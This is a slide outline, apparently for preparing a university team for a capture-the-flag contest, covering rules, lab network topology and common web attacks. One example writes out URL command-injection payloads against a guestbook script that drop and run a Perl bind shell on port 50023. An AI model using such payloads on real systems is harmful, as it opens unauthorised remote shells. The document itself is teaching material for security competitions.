Survey
* Your assessment is very important for improving the workof artificial intelligence, which forms the content of this project
* Your assessment is very important for improving the workof artificial intelligence, which forms the content of this project
Security-focused operating system wikipedia , lookup
Computer security wikipedia , lookup
Deep packet inspection wikipedia , lookup
Cross-site scripting wikipedia , lookup
Distributed firewall wikipedia , lookup
Mobile security wikipedia , lookup
Cracking of wireless networks wikipedia , lookup
CTF Mike Gerschefske Justin Gray What is it? Came from Defcon UCSB sp0nsorz – won last years Defcon Test Skills of understanding security What it’s not! See who’s 1337 or l4am3r through script kiddie techniques Rules Don’t be Lame This includes (D)DoS – Unfair bandwidth practices Circumventing the private network and using public ip address (not cool) Illegal stuff is not a good idea E.g. don’t hack the power grid Everything else is legal! At Defcon team reverse engineered score system and generated tokens. People got upset, but was legal Can root boxes but not what’s being tested. w00t Last years event Have to assume this year is similar We p0wn3d the easy parts SQL Injection Example http://128.198.61.43/~estore/cgi-bin/login.php Exploit unchecked user input Security through obscurity OMG – this really works!!! Perl example Real Network Team Box 10.10.1.1 Hub Test Network Mon Box 10.10.1.x Vuln Attack Box Vuln Patch Test 10.10.1.3 Vuln Image Test Box Attack Boxes 10.10.1.4 Team Image 10.10.1.2 Console for Fixes UCCS Boxes UCCS Boxes Network Topography Affectively created two directional nat. Blocking IP addresses is futile All traffic comes from SAME IP Forces Packet Inspection the example http://128.198.61.43/~guestbook/cgibin/guestbook.pl?guestbook=`echo%20e%20"\043\041/usr/bin/perl\nuse%20IO\073\nwhile(1){\nwhile(\044c =new%20IO::Socket::INET(LocalPort,\n50023,Reuse,1,Listen)>accept){\n\044~->fdopen(\044c,w)\073\nSTDIN>fdopen(\044c,r)\073\nsystem\044_%20while<>\073\n\175\n\175\n" %20>%20final.pl` http://128.198.61.43/~guestbook/cgibin/guestbook.pl?guestbook=`chmod%20755%20final.pl` http://128.198.61.43/~guestbook/cgibin/guestbook.pl?guestbook=`final.pl` The basstard demo W00t http://128.198.61.43 SQL Injection Unchecked code injection File upload!!! Buffer overrun Security through obscurity revisited http://128.198.61.43/test/ccauthd/ccauthd.c Backups Network Topography So you wanna be a h4x0rz? Here’s what you need! vi – or any editor a browser – or anything to do http a compiler (depends on the situation) a debugger (optional) a clue! Dumpster diving is cool Getting information from the inside